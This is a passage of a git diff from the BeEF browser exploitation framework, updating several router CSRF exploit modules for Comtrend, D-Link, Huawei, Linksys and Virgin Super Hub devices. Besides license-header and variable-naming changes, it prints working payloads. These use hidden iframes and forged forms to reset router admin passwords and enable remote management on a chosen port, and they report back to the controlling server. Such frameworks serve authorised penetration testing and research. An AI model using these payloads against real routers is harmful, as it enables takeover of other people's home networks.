   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
index 27f47c06e..4b1df0668 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/module.rb b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
index 84948985e..6d4b690ae 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/module.rb
+++ b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Comtrend_ct5624_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js
index e7cad9472..8c7fd4599 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/command.js
+++ b/modules/exploits/router/dlink_dir_615_csrf/command.js
@@ -1,23 +1,15 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+  var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
       [{'type':'hidden', 'name':'ACTION_POST',     'value':'1'} ,
        {'type':'hidden', 'name':'apply',           'value':'Save Settings'},
        {'type':'hidden', 'name':'admin_name',      'value':'admin'},
@@ -32,9 +24,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dir615_iframe);
+    document.body.removeChild(dir615_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/dlink_dir_615_csrf/config.yaml b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
index 7c1ea2e30..eec7a5fd5 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/dlink_dir_615_csrf/module.rb b/modules/exploits/router/dlink_dir_615_csrf/module.rb
index f9a62e534..0d400c84a 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/module.rb
+++ b/modules/exploits/router/dlink_dir_615_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dir_615_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index f25c89a5b..c48624322 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -1,23 +1,15 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
+  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
       [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
        {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
        {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
@@ -28,9 +20,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dsl500t_iframe);
+    document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
index d7e6ace24..ad849fb86 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/module.rb b/modules/exploits/router/dlink_dsl500t_csrf/module.rb
index 804200959..78b358462 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/module.rb
+++ b/modules/exploits/router/dlink_dsl500t_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dsl500t_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index bfe98e957..09667bd04 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -1,32 +1,24 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-beef.execute(function() {
-  var gateway = '<%= @base %>'; 
-  var username = '<%= @username %>';
-  var passwd = '<%= @password %>';
 
-  var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
-  huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+beef.execute(function() {
+  var gateway  = '<%= @base %>'; 
+  var username = '<%= @username %>';
+  var passwd   = '<%= @password %>';
+  var timeout  = 15;
+
+  var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(huawei_smartax_mt880_iframe);
+    document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml
index d12a65130..7febce906 100644
--- a/modules/exploits/router/huawei_smartax_mt880/config.yaml
+++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/huawei_smartax_mt880/module.rb b/modules/exploits/router/huawei_smartax_mt880/module.rb
index 77f39ba20..ce8c3ff77 100644
--- a/modules/exploits/router/huawei_smartax_mt880/module.rb
+++ b/modules/exploits/router/huawei_smartax_mt880/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Huawei_smartax_mt880_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js
index cb7d19eb5..60cee7e6c 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/command.js
+++ b/modules/exploits/router/linksys_befsr41_csrf/command.js
@@ -1,28 +1,21 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-beef.execute(function() {
 
-  var befsr41_iframe = beef.dom.createInvisibleIframe();
-  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+beef.execute(function() {
+  var timeout = 15;
+
+  var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(befsr41_iframe);
+    document.body.removeChild(befsr41_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
index d3308de95..d6678fa30 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml
+++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/linksys_befsr41_csrf/module.rb b/modules/exploits/router/linksys_befsr41_csrf/module.rb
index 40dcaa4dc..96044225b 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/module.rb
+++ b/modules/exploits/router/linksys_befsr41_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_befsr41_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
index 0f362bf89..5b1097a45 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
@@ -1,24 +1,16 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-beef.execute(function() {
-  var port = '<%= @port %>';
-  var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
 
-  var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+beef.execute(function() {
+  var port    = '<%= @port %>';
+  var gateway = '<%= @base %>'; 
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
+
+  var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
       [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
        {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
        {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
@@ -36,9 +28,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g2_iframe);
+    document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
index a64dd89fd..ca2aa920b 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
index 94f5d6ed0..15e6082f7 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_wrt54g2_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js
index d18e65898..668315b6e 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js
@@ -1,44 +1,37 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-beef.execute(function() {
-  var port = '<%= @port %>';
-  var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
 
-  var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
-      [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
-          {'type':'hidden', 'name':'http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'https_enable', 'value':'0'},
-          {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
-          {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+beef.execute(function() {
+  var port    = '<%= @port %>';
+  var gateway = '<%= @base %>'; 
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
+
+  var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+      [
+          {'type':'hidden', 'name':'remote_mgt_https',   'value':'0'} ,
+          {'type':'hidden', 'name':'http_enable',        'value':'1'},
+          {'type':'hidden', 'name':'https_enable',       'value':'0'},
+          {'type':'hidden', 'name':'PasswdModify',       'value':'1'},
+          {'type':'hidden', 'name':'http_passwd',        'value':passwd},
           {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
-          {'type':'hidden', 'name':'_http_enable', 'value':'1'},
-          {'type':'hidden', 'name':'remote_management', 'value':'1'},
-          {'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
-          {'type':'hidden', 'name':'http_wanport', 'value':port},
-          {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
-          {'type':'hidden', 'name':'layout', 'value':'en'}
+          {'type':'hidden', 'name':'_http_enable',       'value':'1'},
+          {'type':'hidden', 'name':'remote_management',  'value':'1'},
+          {'type':'hidden', 'name':'web_wl_filter',      'value':'1'},
+          {'type':'hidden', 'name':'http_wanport',       'value':port},
+          {'type':'hidden', 'name':'upnp_enable',        'value':'1'},
+          {'type':'hidden', 'name':'layout',             'value':'en'}
       ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(wrt54g_iframe);
+    document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
index 4129d26e1..e91577f32 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/module.rb b/modules/exploits/router/linksys_wrt54g_csrf/module.rb
index 47ee87039..cffed8877 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/module.rb
+++ b/modules/exploits/router/linksys_wrt54g_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_wrt54g_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
index fb0ed4ca4..5c5e94b94 100644
--- a/modules/exploits/router/virgin_superhub_csrf/command.js
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -1,47 +1,39 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var gateway = '<%= @base %>'; 
 	var passwd  = '<%= @password %>';
 	var port    = '<%= @port %>';
+	var timeout = 15;
 
-	var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
-		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
-		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
 	]);
 
